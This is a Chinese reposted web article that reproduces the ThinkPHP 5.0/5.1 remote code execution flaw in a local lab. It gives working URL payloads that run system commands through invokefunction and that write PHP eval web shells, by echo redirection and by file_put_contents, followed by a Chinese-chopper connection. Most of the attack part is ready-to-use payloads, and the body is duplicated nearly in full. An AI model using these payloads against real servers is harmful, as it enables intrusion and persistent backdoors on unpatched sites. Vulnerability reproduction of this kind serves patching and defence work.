ThinkPHP 5.x远程命令执行漏洞复现
时间:2023年06月11日
/来源:网络
/编辑:佚名
一、漏洞描述
2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075
漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。
二、漏洞影响版本
Thinkphp 5.x-Thinkphp 5.1.31
Thinkphp 5.0.x<=5.0.23
三、漏洞复现
1、网站下载Thinkphp 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html
2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问http://192.168.10.171/thinkphp5.0.22/public
data:image/s3,"s3://crabby-images/dc842/dc842fa545cc815017df993257d502d7d74b7986" alt=""
3、利用system函数远程命令执行
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
data:image/s3,"s3://crabby-images/fdb4f/fdb4f74c1d6b875aed322915ed565534f77e1e90" alt=""
4、通过phpinfo函数查看phpinfo()的信息
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
data:image/s3,"s3://crabby-images/40af6/40af6bc089031f8a39860dca7be15927951d12ec" alt=""
5、写入shell
Payload如下:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
注意:需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行。
data:image/s3,"s3://crabby-images/9f2a6/9f2a6b7b3106bd6cdb5d0e460e3ab2c14f6afa35" alt=""
6、查看是否成功写入shell
data:image/s3,"s3://crabby-images/365e7/365e72b37a8a9ffc8e66dc7066e41257c7f92f64" alt=""
7、菜刀连接
data:image/s3,"s3://crabby-images/0b587/0b5877cea460082527dc1d2d860bc6a5e2c71c4d" alt=""
8、第二种的写入shell的方法
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
data:image/s3,"s3://crabby-images/1188b/1188bb851b527cc7a4a3090dd963c81708c1e3f7" alt=""
9、查看是否成功写入文件
data:image/s3,"s3://crabby-images/35b8d/35b8d1aa43b60b024b52f4e3b23db7d99716c8cd" alt=""
10、菜刀连接
2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075
漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。
二、漏洞影响版本
Thinkphp 5.x-Thinkphp 5.1.31
Thinkphp 5.0.x<=5.0.23
三、漏洞复现
1、网站下载Thinkphp 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html
2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问http://192.168.10.171/thinkphp5.0.22/public
data:image/s3,"s3://crabby-images/dc842/dc842fa545cc815017df993257d502d7d74b7986" alt=""
3、利用system函数远程命令执行
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
data:image/s3,"s3://crabby-images/fdb4f/fdb4f74c1d6b875aed322915ed565534f77e1e90" alt=""
4、通过phpinfo函数查看phpinfo()的信息
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
data:image/s3,"s3://crabby-images/40af6/40af6bc089031f8a39860dca7be15927951d12ec" alt=""
5、写入shell
Payload如下:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
注意:需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行。
data:image/s3,"s3://crabby-images/9f2a6/9f2a6b7b3106bd6cdb5d0e460e3ab2c14f6afa35" alt=""
6、查看是否成功写入shell
data:image/s3,"s3://crabby-images/365e7/365e72b37a8a9ffc8e66dc7066e41257c7f92f64" alt=""
7、菜刀连接
data:image/s3,"s3://crabby-images/0b587/0b5877cea460082527dc1d2d860bc6a5e2c71c4d" alt=""
8、第二种的写入shell的方法
Payload如下:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
data:image/s3,"s3://crabby-images/1188b/1188bb851b527cc7a4a3090dd963c81708c1e3f7" alt=""
9、查看是否成功写入文件
data:image/s3,"s3://crabby-images/35b8d/35b8d1aa43b60b024b52f4e3b23db7d99716c8cd" alt=""
10、菜刀连接
data:image/s3,"s3://crabby-images/33858/3385855eb3c89262a5cfee1d461d719538f597a0" alt=""
新闻资讯 更多
- 【建站知识】查询nginx日志状态码大于400的请求并打印整行04-03
- 【建站知识】Python中的logger和handler到底是个什么?04-03
- 【建站知识】python3拉勾网爬虫之(您操作太频繁,请稍后访问)04-03
- 【建站知识】xpath 获取meta里的keywords及description的方法04-03
- 【建站知识】python向上取整以50为界04-03
- 【建站知识】scrapy xpath遇见乱码解决04-03
- 【建站知识】scrapy爬取后中文乱码,解决word转为html 时cp1252编码问题04-03
- 【建站知识】scrapy采集—爬取中文乱码,gb2312转为utf-804-03